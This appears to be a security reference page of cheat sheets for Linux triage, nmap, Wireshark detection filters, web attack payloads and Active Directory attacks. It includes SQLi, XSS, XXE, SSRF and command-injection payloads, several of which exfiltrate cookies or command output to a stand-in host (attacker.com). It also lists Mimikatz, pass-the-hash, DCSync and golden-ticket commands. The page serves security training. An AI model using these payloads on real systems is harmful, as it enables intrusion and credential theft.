// Cyber Reference Library

Resources & References

Cheat sheets, YouTube channels, certification roadmaps, and hands-on labs — everything a security practitioner needs in one place.

14 cheat sheets
40+ YouTube channels
50+ courses & certs
50+ labs & CTF platforms
File System Navigation
ls -laList all files with permissions, sizes, hidden files
find / -name "*.conf" 2>/dev/nullFind all .conf files from root, suppress errors
find / -perm -4000 2>/dev/nullFind SUID binaries — privilege escalation check
find / -perm -2000 2>/dev/nullFind SGID binaries
find / -writable -type d 2>/dev/nullFind world-writable directories
find /home -mtime -7 -type fFiles modified in the last 7 days in /home
find / -size +100M 2>/dev/nullFind files larger than 100MB
du -sh /* 2>/dev/null | sort -rhDisk usage per top-level dir, sorted by size
df -hDisk free space, human-readable
ls -lai /tmpList /tmp with inode numbers — forensics indicator
Text Processing & Grep
grep -i "error" /var/log/syslogCase-insensitive search
grep -r "password" /etc/ 2>/dev/nullRecursive search for string
grep -v "^#" /etc/ssh/sshd_configShow non-comment lines only
grep -E "^\d{1,3}(\.\d{1,3}){3}" fileGrep for IPv4 addresses
grep -oP '(?<=Failed password for )\w+' /var/log/auth.logExtract failed login usernames
awk '{print $1}' access.log | sort | uniq -c | sort -rn | head -20Top 20 IPs from web log
awk '$9 == 200 {print $7}' access.log | sort | uniq -c | sort -rnTop requested URLs (200 OK)
cut -d: -f1,3,6 /etc/passwdUsername, UID, homedir from passwd
sed -n '/2024-01-15/,/2024-01-16/p' app.logExtract log lines between dates
strings binary | grep -E "https?://"Extract URLs from binary file
User, Groups & Permissions
idCurrent user UID, GID, and groups
cat /etc/passwd | awk -F: '$3 == 0'Find all root-equivalent users (UID=0)
cat /etc/passwd | awk -F: '$7 !~ /nologin|false/'Users with valid login shells
last -a | head -20Recent login history with hostnames
lastb | head -20Failed login attempts (bad logins)
sudo -lCurrent user's sudo permissions
cat /etc/sudoers 2>/dev/nullSudoers file — look for NOPASSWD entries
getfacl fileShow ACL permissions on file
find / -user root -perm -4000 2>/dev/nullSUID files owned by root (privesc)
groups usernameGroups a user belongs to
Processes & Services
ps aux --sort=-%cpu | head -15Top CPU-consuming processes
ps aux --sort=-%mem | head -15Top memory-consuming processes
ps -ef --forestProcess tree with parent-child relationships
lsof -p PIDAll open files for a specific process
lsof -i :80Process listening on port 80
lsof -i TCP -n -P | grep LISTENAll listening TCP services
ss -tulpnAll listening ports with process names (modern)
netstat -tulpnAll listening ports (older systems)
systemctl list-units --type=service --state=runningAll running systemd services
journalctl -u sshd --since "1 hour ago"SSH service logs from last hour
crontab -l 2>/dev/null; ls -la /etc/cron*All cron jobs — current user + system
cat /etc/crontab; ls /etc/cron.d/System cron table and cron.d entries
Network Commands
ip addr showAll network interfaces and addresses
ip route showRouting table
ip neigh showARP cache — neighbors on local network
dig domain.com ANYAll DNS records for a domain
dig -x 8.8.8.8Reverse DNS lookup
nslookup -type=TXT domain.comTXT records (SPF, DKIM, verification)
curl -sI https://site.comHTTP headers only (silent mode)
curl -sk https://site.com/api | python3 -m json.toolFetch JSON and pretty-print
tcpdump -i any -nn -w /tmp/cap.pcapCapture all interfaces to file
tcpdump -i eth0 'port 80 or port 443' -w http.pcapCapture only HTTP/HTTPS traffic
iptables -L -n -v --line-numbersFirewall rules with line numbers and counters
ncat -lvp 4444Listen on port 4444 (netcat listener)
Log Files Reference
/var/log/auth.logSSH logins, sudo usage, PAM authentication (Debian/Ubuntu)
/var/log/secureAuth logs on RHEL/CentOS
/var/log/syslogGeneral system messages
/var/log/messagesGeneral messages on RHEL/CentOS
/var/log/apache2/access.logApache web server access log
/var/log/apache2/error.logApache error log
/var/log/nginx/access.logNginx access log
/var/log/fail2ban.logFail2ban block actions
/var/log/kern.logKernel messages
/var/log/cronCron execution log
~/.bash_historyUser command history — forensics critical!
/root/.bash_historyRoot command history
Forensics & Investigation
sha256sum file && md5sum fileHash file for integrity verification
stat fileAccess/modify/change timestamps (atime/mtime/ctime)
file suspicious_binaryIdentify file type regardless of extension
strings -n 8 binary | grep -E "https?://"Extract URLs from binary (min 8 chars)
xxd binary | head -30Hex dump — check magic bytes / file header
strace -p PID -f 2>&1 | grep -E "open|write|connect"Trace file/network syscalls of process
lsmod | grep -v "$(lsmod | awk '{print $1}' | grep -f /etc/modules)"Loaded kernel modules not in default list (rootkit check)
env | sortEnvironment variables — check for injected values
mount | column -tMounted filesystems, formatted
ls -la /proc/*/exe 2>/dev/null | grep -v "^l"Process executables — spot deleted/unusual paths
Privilege Escalation Checklist
sudo -lWhat commands can current user run as root? Check GTFOBins for exploits
find / -perm -4000 -type f 2>/dev/nullSUID binaries — check each against GTFOBins
find / -perm -2000 -type f 2>/dev/nullSGID binaries
getcap -r / 2>/dev/nullLinux capabilities — cap_setuid+eip is exploitable
cat /etc/crontab; ls /etc/cron.d/; ls /var/spool/cron/All cron jobs — check for writable scripts
find / -writable -type f 2>/dev/null | grep -v procWorld-writable files (config injection, cron abuse)
ps aux | grep rootProcesses running as root — target for injection
cat /etc/exports 2>/dev/null | grep no_root_squashNFS no_root_squash — mount and create SUID binary
ls -la /etc/passwd /etc/shadow /etc/sudoersAre these files writable? Instant privilege escalation
cat /proc/version; uname -aKernel version — check for local kernel exploits (DirtyCOW etc.)
groups; idMember of docker/lxd/disk/adm group? All privesc paths
env | grep -i "path\|ld_\|python\|perl"PATH hijacking and library injection opportunities
SSH & Remote Access
ssh user@host -p 2222Connect to non-standard SSH port
ssh -i ~/.ssh/id_rsa user@hostConnect with private key
ssh -L 8080:localhost:80 user@hostLocal port forward — access remote port 80 via localhost:8080
ssh -R 2222:localhost:22 user@hostRemote port forward — expose local port 22 through remote server
ssh -D 1080 user@hostDynamic SOCKS proxy — route traffic through SSH
ssh -N -f -L 5432:db-server:5432 user@jump-hostBackground tunnel to reach internal DB via jump host
ssh-copy-id user@hostInstall public key on remote host for passwordless auth
ssh-keygen -t ed25519 -C "label"Generate ED25519 key pair (preferred over RSA)
cat /etc/ssh/sshd_config | grep -v "^#" | grep -v "^$"Active SSH server config — check for weak settings
ssh -o StrictHostKeyChecking=no user@hostSkip host key verification (scripting use only)
ssh -J jump-user@jump-host target-user@target-hostSSH via jump host (ProxyJump) in one command
Package Management & System Info
dpkg -l | grep -i "apache\|nginx\|openssh"Installed packages matching pattern (Debian/Ubuntu)
rpm -qa --last | head -20Recently installed packages (RHEL/CentOS)
apt-get update && apt-get upgrade -yUpdate and upgrade all packages (Debian/Ubuntu)
yum update -yUpdate all packages (RHEL 7/CentOS)
dnf update -yUpdate all packages (RHEL 8+/Fedora)
uname -aFull kernel version, architecture, and build date
lsb_release -aDistribution name and version
cat /etc/os-releaseOS release info (works on all modern distros)
lscpuCPU architecture, cores, sockets, cache
free -hRAM and swap usage, human-readable
uptimeSystem uptime and load averages
timedatectlSystem time, timezone, NTP status
Bash One-Liners for IR & Hunting
for ip in $(cat ips.txt); do ping -c1 -W1 $ip &>/dev/null && echo "$ip UP"; donePing sweep from file
while read line; do curl -sI "$line" 2>/dev/null | grep "HTTP/"; echo "$line"; done < urls.txtCheck HTTP status for URLs list
grep -rh "Failed password" /var/log/auth.log* | awk '{print $11}' | sort | uniq -c | sort -rn | head -20Top brute-forced usernames from auth logs
grep "Accepted password\|Accepted publickey" /var/log/auth.log | awk '{print $1,$2,$3,$9,$11}' | tail -30Recent successful SSH logins
cat /var/log/apache2/access.log | awk '{print $1}' | sort | uniq -c | sort -rn | head -20Top visiting IPs in web logs
find /var/www -name "*.php" -newer /var/www/index.php -ls 2>/dev/nullPHP files newer than index — web shell detection
ls -lat /tmp /var/tmp /dev/shm 2>/dev/null | head -30Recently created files in world-writable dirs
ps auxww | awk '{if($11 ~ /perl|python|ruby|bash/) print}' | grep -v grepScript interpreters running as processes
netstat -an 2>/dev/null | grep ESTABLISHED | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -rnTop connected IPs by connection count
Basic Scanning
nmap 192.168.1.1Basic scan — top 1000 ports
nmap 192.168.1.0/24Scan entire subnet
nmap -iL targets.txtScan targets from file
nmap -p 22,80,443 hostScan specific ports
nmap -p- hostAll 65535 ports
nmap --top-ports 1000 hostTop 1000 most common ports
nmap -sn 192.168.1.0/24Ping sweep — host discovery, no port scan
nmap -Pn hostSkip ping, treat host as up (firewalled targets)
nmap -6 hostIPv6 scan
Scan Techniques
nmap -sS hostSYN scan — stealth, default with root, most reliable
nmap -sT hostTCP connect scan — no root required
nmap -sU -p 53,67,123,161 hostUDP scan on common UDP ports
nmap -sA hostACK scan — firewall rule mapping
nmap -sN hostNULL scan — no flags (evades some firewalls)
nmap -sF hostFIN scan
nmap -sX hostXmas scan — FIN, PSH, URG set
nmap -sW hostWindow scan — distinguishes open from filtered
Detection & Version
nmap -sV hostService version detection
nmap -sV --version-intensity 9 hostAggressive version detection (more probes)
nmap -O hostOS detection (requires root)
nmap -A hostAggressive: OS + version + scripts + traceroute
nmap -A -T4 -p- hostFull aggressive scan all ports (common pentest combo)
NSE Scripts
nmap -sC hostDefault safe scripts
nmap --script=vuln hostVulnerability scanning scripts
nmap --script=auth hostAuthentication bypass checks
nmap --script=smb-vuln-ms17-010 -p445 hostEternalBlue (MS17-010) check
nmap --script=smb-vuln-ms08-067 -p445 hostMS08-067 Conficker vulnerability
nmap --script=ssl-heartbleed -p443 hostHeartbleed OpenSSL check
nmap --script=http-enum -p80,443 hostEnumerate web paths and directories
nmap --script=http-title -p80,443,8080,8443 hostGrab HTTP page titles
nmap --script=ssl-cert -p443 hostSSL certificate details
nmap --script=dns-brute domain.comDNS subdomain brute force
nmap --script=ftp-anon -p21 hostCheck anonymous FTP access
nmap --script=banner hostGrab service banners
nmap --script=http-shellshock -p80 hostShellshock CGI vulnerability
nmap --script=smb-enum-shares -p445 hostEnumerate SMB shares
Timing & Performance
nmap -T0 hostParanoid — 5 min between probes, IDS evasion
nmap -T1 hostSneaky — 15 sec between probes
nmap -T2 hostPolite — reduces bandwidth usage
nmap -T3 hostNormal (default)
nmap -T4 hostAggressive — reliable networks, faster
nmap -T5 hostInsane — may miss open ports, high detection risk
nmap --min-rate 5000 -p- hostFast full port scan (~5k pkts/sec)
Output & Evasion
nmap -oA scan_results hostSave in all formats (.nmap .xml .gnmap)
nmap -oN normal.txt hostNormal text output
nmap -oX results.xml hostXML output (for import into other tools)
nmap -v -v hostVery verbose — show open ports as discovered
nmap --reason hostShow reason for each port state
nmap -D RND:10 hostDecoy scan — 10 random fake source IPs
nmap -f --mtu 24 hostFragment packets to evade DPI/IDS
nmap --source-port 53 hostSpoof source as port 53 (DNS bypass trick)
nmap --proxies socks4://127.0.0.1:9050 hostRoute through SOCKS proxy (Tor)
nmap --scan-delay 500ms host500ms delay between probes
Practical Pentest Scan Workflow
nmap -sn 192.168.1.0/24 -oG hosts.gnmapStep 1: Host discovery — identify live hosts
grep "Up" hosts.gnmap | awk '{print $2}' > live.txtStep 2: Extract live IPs to file
nmap -sV -sC -p 22,80,443,445,3389,8080 -iL live.txt -oA quick_scanStep 3: Quick targeted scan on common ports
nmap -p- --min-rate 5000 -iL live.txt -oA full_scanStep 4: Full port scan (background, takes time)
nmap -sV -sC -p $(grep open full_scan.gnmap | awk -F/ '{print $1}' ORS=,) -iL live.txtStep 5: Detailed scan on only open ports found
nmap --script vuln -p$(open_ports) targetStep 6: Vulnerability scripts against confirmed ports
nmap -sU --top-ports 20 -iL live.txtStep 7: UDP sweep on most common UDP services
Service-Specific NSE Scripts
nmap --script=smb-security-mode,smb-enum-shares,smb-enum-users -p445 hostSMB enumeration bundle
nmap --script=rdp-enum-encryption,rdp-vuln-ms12-020 -p3389 hostRDP encryption check + MS12-020 vuln
nmap --script=mysql-info,mysql-enum,mysql-empty-password -p3306 hostMySQL enumeration
nmap --script=ms-sql-info,ms-sql-empty-password,ms-sql-config -p1433 hostMSSQL enumeration
nmap --script=ssh-auth-methods,ssh-hostkey -p22 hostSSH auth methods and host keys
nmap --script=http-methods,http-robots.txt,http-headers -p80,443 hostHTTP methods, robots.txt, response headers
nmap --script=smtp-commands,smtp-enum-users -p25 hostSMTP commands and user enumeration
nmap --script=snmp-info,snmp-sysdescr -sU -p161 hostSNMP info (community string default: public)
nmap --script=ldap-rootdse -p389 hostLDAP root DSE — domain info without auth
nmap --script=vnc-info,vnc-title -p5900 hostVNC service info and desktop title
IP & Basic Filters
ip.addr == 192.168.1.1All traffic to or from this IP
ip.src == 10.0.0.1Traffic sourced from IP
ip.dst == 10.0.0.2Traffic destined to IP
ip.addr == 192.168.1.0/24Entire subnet traffic
!(ip.addr == 192.168.0.0/16)Exclude all RFC1918 — external only
ip.ttl < 5Low TTL — traceroute or spoofing indicator
tcp.port == 443TCP port 443 (HTTPS)
tcp.port in {80 443 8080 8443}Multiple ports — HTTP/HTTPS and alternates
udp.port == 53DNS traffic
not arp and not icmp and not mdnsSuppress background noise
Protocol Filters
httpAll HTTP traffic
tlsTLS/HTTPS (previously ssl)
dnsAll DNS queries and responses
ftpFTP control channel
ftp-dataFTP data transfers
smtp or imap or popEmail protocols
smb or smb2Windows file sharing (SMB v1/v2)
kerberosKerberos authentication traffic
rdpRemote Desktop Protocol
ldapLDAP directory queries
dhcpDHCP lease requests and replies
icmpICMP ping traffic
HTTP Filters
http.requestAll HTTP requests
http.responseAll HTTP responses
http.request.method == "POST"POST requests — forms, credentials, API data
http.response.code == 200Successful responses
http.response.code >= 400Error responses (4xx client, 5xx server)
http.host contains "suspicious"Requests to specific host pattern
http.request.uri contains "../"Directory traversal attempt
http.request.uri contains "cmd="Command injection in URL parameter
http contains "password"HTTP traffic containing password string
http.cookieRequests with session cookies
http.user_agent contains "sqlmap"SQLMap scanner traffic
http.user_agent contains "Nmap"Nmap HTTP script activity
TCP Filters
tcp.flags.syn == 1 and tcp.flags.ack == 0SYN packets only — port scan detection
tcp.flags.reset == 1RST packets — connection resets, scan responses
tcp.flags == 0x002Pure SYN (hex) — aggressive port scanning
tcp.flags == 0x000NULL scan — all flags zero
tcp.flags == 0x029Xmas scan — FIN+PSH+URG set
tcp.analysis.retransmissionRetransmitted packets — network issues
tcp.stream eq 5Follow specific TCP stream by number
tcp.dstport in {4444 1337 8888 31337}Common backdoor/C2 destination ports
DNS Investigation Filters
dns.qry.name contains "evil"DNS queries matching string
dns.qry.type == 1A record queries
dns.qry.type == 28AAAA (IPv6) queries
dns.qry.type == 16TXT record queries — C2/exfil via DNS
dns.qry.type == 255ANY queries — often recon or amplification
dns.resp.len > 512Large responses — DNS tunneling indicator
dns.qry.name.len > 52Unusually long queries — DNS tunneling
dns.count.answers > 10Many answers — DNS amplification DDoS
tshark CLI Reference
tshark -r file.pcapRead and display pcap
tshark -r file.pcap -Y "http.request"Apply display filter while reading
tshark -r f.pcap -T fields -e ip.src -e ip.dst -e tcp.dstportExtract specific fields to stdout
tshark -i eth0 -w cap.pcap -b filesize:51200Capture rotating at 50MB files
tshark -r f.pcap -Y dns -T fields -e dns.qry.name | sort -uAll unique DNS queries
tshark -r f.pcap -z io,phsProtocol hierarchy statistics
tshark -r f.pcap -z conv,tcpTCP conversation statistics
tshark -r f.pcap -z endpoints,ipIP endpoint statistics
tshark -r f.pcap -Y "http.request" -T fields -e http.host -e http.request.uriExtract HTTP requests
Malware Traffic Patterns
tcp.dstport == 4444 or tcp.dstport == 1337Common Metasploit / C2 ports
http.request.method == "POST" and http.request.uri contains "/gate"Common botnet gate POST pattern
dns.qry.name.len > 50Unusually long DNS names — likely DNS tunneling (iodine, dnscat)
http.user_agent == "" or http.user_agent == "-"Empty/missing User-Agent — scripted or malware HTTP client
ssl.handshake.type == 1 and !(ssl.handshake.extensions_server_name)TLS without SNI — unusual for browsers, common in C2
frame.time_delta == 60 or frame.time_delta == 300Exact-interval beaconing — C2 check-in pattern
tcp.len == 0 and tcp.flags.push == 1PSH+empty — keepalive or C2 heartbeat
http.request.uri contains ".php?id=" or contains "cmd="Web shell interaction patterns
icmp.data_len > 100ICMP data payload larger than normal ping — ICMP tunneling
dns.qry.type == 16 and dns.resp.len > 200TXT record responses — C2 commands via DNS
Credential & Data Extraction
http.authbasicHTTP Basic Auth credentials (base64 encoded) — visible in clear text
ftp.request.command == "PASS"FTP password transmitted in clear text
telnet.data contains "password"Telnet session credential strings
smtp.data.fragment contains "password"Credentials in SMTP DATA section
http.request.method == "POST" and http contains "password"POST requests containing password field
kerberos.CNameString and kerberos.pvnoKerberos AS-REQ with username — user enumeration
ntlmssp.auth.usernameNTLM authentication username field
Follow → TCP StreamRight-click packet → Follow TCP Stream to see full session content
File → Export Objects → HTTPExtract all files transferred over HTTP from a PCAP
Statistics → Conversations → TCPSee top talkers and data volumes per connection
Analysis Shortcuts & Tips
Ctrl+FFind packet — search by string, hex, regex across all fields
Ctrl+GGo to packet number
Ctrl+MMark packet — highlight for reference
Ctrl+DDisplay filter expression builder
Right-click → Apply as FilterClick any field value and instantly filter on it — fastest way to drill down
Statistics → Protocol HierarchyVisualize what protocols are present in the capture by volume
Statistics → IO GraphPlot traffic volume over time — see spikes and patterns
Statistics → Expert InformationQuick summary of errors, warnings, notes across the capture
View → Time Display Format → UTCShow timestamps in UTC — critical for correlation with logs
Analyze → Decode AsForce Wireshark to decode traffic as a specific protocol (e.g., non-standard ports)
OWASP Top 10 (2021)
A01 — Broken Access ControlIDOR, path traversal, privilege escalation, missing auth checks
A02 — Cryptographic FailuresSensitive data in clear text, weak ciphers, no TLS, hardcoded secrets
A03 — InjectionSQLi, NoSQLi, OS command injection, LDAP injection, SSTI
A04 — Insecure DesignMissing threat modeling, no security controls in architecture
A05 — Security MisconfigurationDefault creds, unnecessary features, verbose error messages, open cloud storage
A06 — Vulnerable ComponentsOutdated libraries, unpatched frameworks, unverified dependencies
A07 — Auth & Session FailuresWeak passwords, no MFA, credential stuffing, session fixation
A08 — Software & Data IntegrityInsecure CI/CD, unsigned updates, deserialization flaws
A09 — Logging FailuresNo audit trail, login events not logged, unmonitored logs
A10 — SSRFServer fetches attacker-controlled URLs — cloud metadata, internal services
SQL Injection Payloads
'Basic error trigger — look for SQL errors in response
' OR '1'='1Classic auth bypass (WHERE clause always true)
' OR 1=1 --Comment out rest of query (MySQL/MSSQL)
' OR 1=1 #Comment character for MySQL
' UNION SELECT NULL,NULL,NULL--UNION-based — find number of columns
' UNION SELECT username,password,NULL FROM users--Dump credentials via UNION
' AND SLEEP(5)--Time-based blind SQLi (MySQL)
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--Error-based — MSSQL table enumeration
'; EXEC xp_cmdshell('whoami')--OS command via MSSQL xp_cmdshell critical
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--Boolean blind character extraction
XSS Payloads
<script>alert(1)</script>Basic reflected XSS test
<img src=x onerror=alert(1)>Event handler XSS (bypasses script tag filter)
<svg onload=alert(1)>SVG-based XSS
"><script>alert(document.cookie)</script>Break out of attribute context, steal cookies
javascript:alert(1)href/src attribute context
<script>document.location='http://attacker.com/?c='+document.cookie</script>Cookie exfiltration
<script>new Image().src='//attacker.com/?'+document.cookie</script>Stealth cookie theft via img request
'-alert(1)-'JS string context — break out of JS string
{{7*7}}SSTI test — if output is 49, template injection exists
File Inclusion & Path Traversal
../../../etc/passwdClassic LFI — 3 levels up to root
....//....//....//etc/passwdFilter bypass — double dots + slash
..%2F..%2F..%2Fetc%2FpasswdURL encoded traversal
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswdDouble URL encoded
/etc/passwd%00Null byte termination — bypasses extension check
php://filter/convert.base64-encode/resource=index.phpPHP filter — read source code base64 encoded
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=Data wrapper RFI — remote code execution
/proc/self/environLFI → RCE via environment variable injection
/var/log/apache2/access.logLFI → RCE via log poisoning — inject PHP into User-Agent
Security Headers Reference
Content-Security-PolicyControls allowed script/style sources. default-src 'self' prevents most XSS
Strict-Transport-SecurityForces HTTPS. max-age=31536000; includeSubDomains; preload
X-Frame-OptionsClickjacking protection. Values: DENY or SAMEORIGIN
X-Content-Type-OptionsPrevents MIME sniffing. Always set: nosniff
Referrer-PolicyControls referrer info. Use: no-referrer or strict-origin
Permissions-PolicyRestrict browser features: camera, geolocation, microphone
X-XSS-ProtectionLegacy header (deprecated in modern browsers, set to: 0)
Cache-ControlSensitive pages: no-store, no-cache, must-revalidate
Burp Suite Tips
Ctrl+RSend request to Repeater
Ctrl+ISend request to Intruder
Ctrl+Shift+RSend to Repeater and go to Repeater tab
Ctrl+UURL encode selection
Ctrl+Shift+UURL decode selection
Intercept → Action → Do interceptForce intercept response to modify before browser receives
Match & Replace (Proxy Settings)Automatically modify headers on all requests/responses
Intruder → Cluster BombTest all combinations of multiple payloads (e.g., user+pass pairs)
CollaboratorOut-of-band detection for blind SSRF, XXE, blind XSS
Extensions → Active Scan++Enhanced active scanning for more vuln classes
XXE Injection
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>Classic XXE — read local file
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]>Read /etc/shadow (if permissions allow)
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe">]>XXE SSRF — server makes request to attacker URL
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>Blind XXE via external DTD — OOB exfiltration
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">XXE on Windows targets
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">PHP wrapper inside XXE — bypass some filters
Content-Type: application/xmlChange content-type to XML if app doesn't enforce JSON — may enable XXE
SVG file upload XXE<svg><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><text>&xxe;</text></svg>
SSRF Payloads & Bypass
http://localhost/adminAccess internal admin panel via SSRF
http://127.0.0.1/Loopback variant
http://169.254.169.254/latest/meta-data/AWS EC2 metadata — IAM credentials, instance info critical
http://169.254.169.254/latest/meta-data/iam/security-credentials/AWS IAM role credentials via metadata
http://metadata.google.internal/computeMetadata/v1/GCP metadata endpoint
http://169.254.169.254/metadata/instance?api-version=2021-02-01Azure IMDS endpoint
http://0177.0.0.1/ or http://0x7f.0.0.1/127.0.0.1 bypass: octal or hex encoding
http://[::1]/IPv6 localhost SSRF bypass
http://attacker.com → resolves to 127.0.0.1DNS rebinding — register domain pointing to 127.0.0.1
file:///etc/passwdLocal file read via SSRF (if file:// scheme allowed)
dict://localhost:6379/infoSSRF to Redis — can lead to RCE
JWT Attacks
eyJ... (base64)JWTs start with eyJ — always three dot-separated base64url sections
Algorithm: "none"Change alg to "none", remove signature — some libraries accept it
RS256 → HS256If server uses RS256 public key, switch to HS256 and sign with the public key as secret
Weak secret brute forcehashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
jwt_tool.py JWT -M atJWT Tool automated tests — all common attacks
Modify payload claimsDecode header+payload (base64), change role/sub/exp, re-sign with cracked secret
kid header injectionIf kid is SQL table name: kid = "' UNION SELECT 'attackersecret'-- " → sign with that value
jku/x5u header injectionPoint jku to attacker-controlled URL hosting malicious JWK set
exp claimSet exp to far future (Unix timestamp) to create non-expiring token
Command Injection
; whoamiSemicolon — run second command regardless of first
&& whoamiExecute only if first command succeeds
|| whoamiExecute only if first command fails
| whoamiPipe output of first to second
`whoami`Backtick subshell execution
$(whoami)$() subshell — more portable than backticks
%0a whoamiURL-encoded newline — inject into HTTP parameters
whoami%0d%0aCRLF injection combined with command injection
ping -c1 attacker.comBlind injection test — observe DNS/ICMP at attacker side
curl http://attacker.com/$(whoami)OOB data exfil from blind command injection
w'h'o'a'm'i or wh""oamiQuote insertion — bypass simple string filters
Enumeration — Native Commands
net user /domainList all domain users
net group /domainList all domain groups
net group "Domain Admins" /domainMembers of Domain Admins
net localgroup administratorsLocal admin group members
nltest /domain_trustsList domain trusts
nltest /dclist:DOMAINList domain controllers
set logonserverCurrent logon server / DC
whoami /allCurrent user SID, groups, privileges
gpresult /RApplied Group Policy summary
wmic computersystem get name,domain,usernameComputer domain and current user via WMI
PowerView Enumeration
Import-Module .\PowerView.ps1Load PowerView
Get-DomainCurrent domain info
Get-DomainUser | select samaccountname,descriptionAll users with descriptions (check for passwords!)
Get-DomainUser -SPNUsers with Service Principal Names — Kerberoasting targets
Get-DomainUser -PreauthNotRequiredAS-REP Roasting targets (no Kerberos preauth)
Get-DomainGroup -Identity "Domain Admins" | select memberDomain Admin group members
Get-DomainComputer | select dnshostname,operatingsystemAll domain computers with OS
Find-LocalAdminAccessFind hosts where current user has local admin noisy
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDsACLs on Domain Admins group
Find-InterestingDomainShareFile -Include "*.txt","*.xml","*.ini"Search shares for interesting files
Kerberoasting
GetUserSPNs.py DOMAIN/user:pass -dc-ip DC_IPImpacket — list Kerberoastable accounts
GetUserSPNs.py DOMAIN/user:pass -dc-ip DC_IP -requestRequest TGS tickets for all SPNs
GetUserSPNs.py DOMAIN/user:pass -dc-ip DC_IP -outputfile hashes.txtSave hashes to file for cracking
Invoke-Kerberoast -OutputFormat Hashcat | flPowerView — request TGS tickets
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txtCrack TGS-REP (Kerberoast hashes)
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.ruleWith rule-based mutations
AS-REP Roasting
GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IPTest users for no preauth (no creds needed)
GetNPUsers.py DOMAIN/user:pass -dc-ip DC_IP -requestWith valid creds — enumerate and grab hashes
Get-DomainUser -PreauthNotRequired | select samaccountnamePowerView — find vulnerable accounts
hashcat -m 18200 asrep_hashes.txt rockyou.txtCrack AS-REP hashes (mode 18200)
Pass-the-Hash / Pass-the-Ticket
sekurlsa::logonpasswordsMimikatz — dump LSASS credentials and hashes
sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:HASH /run:cmd.exeMimikatz — Pass-the-Hash spawn shell
psexec.py DOMAIN/USER@TARGET -hashes :NTLM_HASHImpacket PsExec with hash
wmiexec.py DOMAIN/USER@TARGET -hashes :NTLM_HASHImpacket WMIExec with hash
smbexec.py DOMAIN/USER@TARGET -hashes :NTLM_HASHImpacket SMBExec with hash
sekurlsa::tickets /exportMimikatz — export Kerberos tickets (.kirbi files)
kerberos::ptt ticket.kirbiMimikatz — inject ticket into session (PtT)
rubeus.exe ptt /ticket:base64_ticketRubeus — Pass-the-Ticket
DCSync & Domain Dominance
lsadump::dcsync /domain:DOMAIN /user:krbtgtMimikatz DCSync — get krbtgt hash (Golden Ticket)
lsadump::dcsync /domain:DOMAIN /all /csvDump all domain hashes via DCSync
secretsdump.py DOMAIN/USER@DC_IP -hashes :HASHImpacket — remote hash dump via DCSync
kerberos::golden /user:Administrator /domain:DOMAIN /sid:S-1-5-21-... /krbtgt:HASH /id:500Mimikatz — create Golden Ticket persistence
kerberos::silver /service:cifs/target /domain:DOMAIN /sid:SID /target:TARGET /rc4:HASHSilver Ticket for specific service
Get-DomainObjectAcl -SearchBase "DC=domain,DC=com" -Rights DCSyncFind accounts with DCSync rights
BloodHound / SharpHound
SharpHound.exe -c All --zipfilename bh.zipCollect all data types — users, groups, sessions, ACLs, trusts
SharpHound.exe -c DCOnlyFast DC-only collection — less noisy
Invoke-BloodHound -CollectionMethod All -ZipFilename bh.zipPowerShell version via PowerSploit
bloodhound-python -u user -p pass -d DOMAIN -ns DC_IP -c AllLinux BloodHound collector (no agent needed on target)
Shortest Paths to Domain AdminsBloodHound query — find attack path from owned user to DA
Find Principals with DCSync RightsPre-built query — who can perform DCSync without being DA
Find Computers with Unconstrained DelegationComputers with this flag can capture TGTs — high value targets
Find AS-REP Roastable UsersPre-built query in BloodHound Analysis tab
Mark nodes as OwnedRight-click → Mark as Owned — BloodHound highlights paths from owned nodes
Lateral Movement
psexec.py DOMAIN/user:pass@targetImpacket PsExec — creates PSEXESVC service, drops binary to ADMIN$
wmiexec.py DOMAIN/user:pass@targetWMI exec — uses WMI, no service created, semi-interactive shell
smbexec.py DOMAIN/user:pass@targetSMB exec — uses a service but no binary written to disk
atexec.py DOMAIN/user:pass@target "whoami"At/Task Scheduler execution via SMB
evil-winrm -i target -u user -p passWinRM shell (port 5985) — PowerShell remoting
xfreerdp /u:user /p:pass /v:target /cert-ignoreRDP from Linux (xfreerdp)
Invoke-Command -ComputerName target -ScriptBlock {whoami}PowerShell Remoting (WinRM must be enabled)
Enter-PSSession -ComputerName target -Credential (Get-Credential)Interactive PS remote session
net use \\target\ADMIN$ /user:DOMAIN\user passMap admin share — verify admin access before moving laterally
Domain Trust Attacks
nltest /domain_trusts /all_trustsEnumerate all domain trusts (bidirectional, forest, external)
Get-DomainTrust | select SourceName,TargetName,TrustType,TrustDirectionPowerView — trust direction and type
Get-ForestDomainAll domains in current forest
Get-DomainForeignGroupMemberForeign users in local groups — cross-domain group memberships
kerberos::golden /domain:child.domain /krbtgt:HASH /sid:CHILD_SID /sids:FOREST_ROOT_SID-519Inter-realm Golden Ticket — SID history injection across trust
SID History abuseAdd DA SID of target forest to compromised account's SID history → cross-forest access
Unconstrained Delegation + Printer BugForce DC to authenticate to unconstrained host → capture TGT → DCSync
ms-rprn.py DOMAIN/user:pass@victim_dc -hashes HASH attacker_hostImpacket printer bug — coerce DC authentication
msfconsole Core Commands
msfconsoleStart Metasploit Framework
helpShow available commands
search type:exploit name:ms17 platform:windowsSearch with filters
search cve:2021-44228Search by CVE number
use exploit/windows/smb/ms17_010_eternalblueSelect a module
infoShow full module info, options, and references
show optionsShow required and optional parameters
show payloadsShow compatible payloads for current module
